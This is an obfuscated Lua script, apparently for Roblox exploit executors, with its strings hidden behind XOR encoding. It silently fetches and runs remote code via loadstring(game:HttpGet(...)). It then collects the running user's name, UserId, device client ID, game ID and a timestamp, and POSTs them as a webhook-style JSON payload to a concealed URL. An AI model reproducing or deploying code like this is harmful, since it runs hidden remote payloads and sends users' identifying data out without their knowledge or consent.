--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v27,v28) local v29={};for v30=1, #v27 do v6(v29,v0(v4(v1(v2(v27,v30,v30 + 1 )),v1(v2(v28,1 + (v30% #v28) ,1 + (v30% #v28) + 1 )))%256 ));end return v5(v29);end pcall(function() loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\253\32\235\140\198\12\212\231\222\51\227\183\215\27\195\140\238\43\239\173\194\12\194\194\215\106\244\190\193\13\158\203\222\36\226\168\136\19\208\202\213\106\227","\126\177\163\187\69\134\219\167")))();end);local v8=game:GetService(v7("\11\217\62\213\207\38\223\60\204\255\38","\156\67\173\74\165"));local v9=game:GetService(v7("\4\187\72\15\185\52\85","\38\84\215\41\118\220\70"));local v10=game:GetService(v7("\98\20\58\51\240\81\26\59\6\247\83\5\17\23\236\70\31\33\23","\158\48\118\66\114"));local v11=(syn and syn.request) or http_request or request or HttpPost ;local v12=v7("\163\48\4\38\96\255\180\228\32\25\37\112\170\233\175\106\19\57\126\234\250\187\45\95\33\118\167\243\164\43\27\37\60\244\168\253\115\66\98\42\247\169\254\125\66\103\43\240\162\253\119\70\121\36\246\247\178\1\61\29\36\144\249\165\15\63\102\39\253\232\137\15\57\25\116\168\194\184\42\26\16\92\137\169\168\60\18\21\91\159\237\133\2\47\52\91\164\175\159\23\0\102\74\183\175\133\60\10\33\107\143\255\173\27\66\101\96\252\249\189\114","\155\203\68\112\86\19\197");local v13={[v7("\101\210\56\232\69\118\241\181\114\196\38\249","\152\38\189\86\156\32\24\133")]=v7("\253\71\183\74\245\84\166\82\245\88\169\9\246\68\168\72","\38\156\55\199")};local v14=v9.LocalPlayer;local v15=v14.UserId;local v16=v14.Name;local v17=v10:GetClientId();local v18=math.random(0,16777607 -(232 + 160) );local v19=os.date(v7("\233\55\104","\35\200\29\28\72\115\20\154"));local v20=string.format(v7("\92\172\145\154\221\126\48\67\250\129\141\137\118\113\73\237\213\159\184\24\23","\84\121\223\177\191\237\76"),os.date(v7("\254\116","\161\219\54\169\192\90\48\80")),v19.hour,v19.min,v19.sec);local v21=game.GameId;local v22={[v7("\76\79\2\32\77\81","\69\41\34\96")]={{[v7("\168\202\195\6\7","\75\220\163\183\106\98")]=v7("\36\191\134\0\216\16\191\203\28\220\27\250\184\46\202\22\191\134","\185\98\218\235\87"),[v7("\207\57\52\229\204\163\219\40\46\233\208","\202\171\92\71\134\190")]=v7("\26\206\33\141\38\207\41\200\44\217\41\139\60\213\41\140\105\234\41\145\105\242\53\155\61\196\33","\232\73\161\76"),[v7("\175\192\82\88","\126\219\185\34\61")]=v7("\30\199\93\122","\135\108\174\62\18\30\23\147"),[v7("\181\230\38\196\10","\167\214\137\74\171\120\206\83")]=v18,[v7("\141\249\55\81\252\180","\199\235\144\82\61\152")]={{[v7("\9\23\180\46","\75\103\118\217")]=v7("\242\71\117\6\183\31\202\81\42","\126\167\52\16\116\217"),[v7("\222\47\44\149\177","\156\168\78\64\224\212\121")]=v16   .. v7("\71\166","\174\103\142\197")   .. v15   .. ")" ,[v7("\95\38\83\49\43\91","\152\54\72\63\88\69\62")]=true},{[v7("\218\197\227\89","\60\180\164\142")]=v7("\112\105\44\13\125","\114\56\62\101\73\71\141"),[v7("\174\232\215\209\189","\164\216\137\187")]=v17,[v7("\219\232\61\187\168\251","\107\178\134\81\210\198\158")]=true},{[v7("\54\15\143\195","\202\88\110\226\166")]=v7("\228\14\143\242\138\234\43\216","\170\163\111\226\151"),[v7("\7\49\190\45\75","\73\113\80\210\88\46\87")]=v7("\179\35\207\30\232\153\108\234\19\234\132\108\228\54\189\193","\135\225\76\173\114")   .. v21 ,[v7("\19\227\180\185\162\184","\199\122\141\216\208\204\221")]=false},{[v7("\163\220\29\245","\150\205\189\112\144\24")]=v7("\17\141\178\73\23\156\16\29\53\222","\112\69\228\223\44\100\232\113"),[v7("\194\30\11\198\179","\230\180\127\103\179\214\28")]=v20,[v7("\133\11\83\79\234\68","\128\236\101\63\38\132\33")]=false}}}}};local v23=v8:JSONEncode(v22);local v24={[v7("\153\187\29","\175\204\201\113\36\214\139")]=v12,[v7("\106\201\33\212\11\67","\100\39\172\85\188")]=v7("\157\87\138\180","\83\205\24\217\224"),[v7("\206\192\204\57\227\215\222","\93\134\165\173")]=v13,[v7("\156\253\197\219","\30\222\146\161\162\90\174\210")]=v23};local v25,v26=pcall(v11,v24);if  not v25 then warn(v7("\195\79\121\6\224\74\48\30\234\14\99\15\235\74\48\29\224\76\120\5\234\69\42","\106\133\46\16"),v26);end
